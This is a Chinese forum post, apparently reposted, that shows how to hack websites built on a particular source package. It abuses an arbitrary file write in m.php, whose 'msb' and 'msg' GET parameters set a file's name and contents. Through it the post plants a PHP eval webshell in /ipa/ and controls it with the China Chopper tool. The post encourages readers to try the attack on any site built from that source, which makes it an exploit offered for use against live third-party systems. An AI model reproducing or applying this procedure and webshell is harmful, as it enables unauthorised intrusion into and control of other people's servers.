无名 发表于 2022-5-8 15:29:17

【HR】利用一个源码漏洞黑进xx站


http://cdn.u1.huluxia.com/g4/M03/D2/38/rBAAdmFr8OmAKlN9AAA5vtoCYHE023.jpg
话不多说,先讲一下这个漏洞
其实就是一个文件写入漏洞,我利用了这个漏洞写入了后门,就是这个API接口的漏洞
这源码里面的m.php文件可以任意写入文件http://cdn.u1.huluxia.com/g4/M03/D2/38/rBAAdmFr8OqADwy4AASc_2wiylM22.jpeg
http://cdn.u1.huluxia.com/g4/M03/D2/38/rBAAdmFr8OqAfxMrAAHahOQkvaA72.jpeg
可以看到msb是文件名,msg这些参数是写入文件里面的,
使用get类型提交m.php?msb=kele&msg=测试,然后提交就会在/ipa/目录下多了个kele.php的文件,里面也有测试两个字http://cdn.u1.huluxia.com/g4/M03/D2/38/rBAAdmFr8OuAI_AfAALdfh3iy1g45.jpeg
那么我把他换成<?php phpinfo();?>呢http://cdn.u1.huluxia.com/g4/M03/D2/38/rBAAdmFr8OyATs9vAASFbwwfZy436.jpeg

然后再打开/ipa/kele.php文件http://cdn.u1.huluxia.com/g4/M03/D2/38/rBAAdmFr8O2AVRmvAAMThiNZPy0163.jpg
可以看到已经执行了php代码,然后在换成后门代码
<?php @eval($_POST['kele']); ?>
然后在用菜刀连接就好了[滑稽]
这就是个任意文件写入漏洞,看到这个源码搭建的站可以试试利用这个漏洞

如果影响了某人的利益请联系我删帖[滑稽]
注非原创,搬砖
页: [1]
查看完整版本: 【HR】利用一个源码漏洞黑进xx站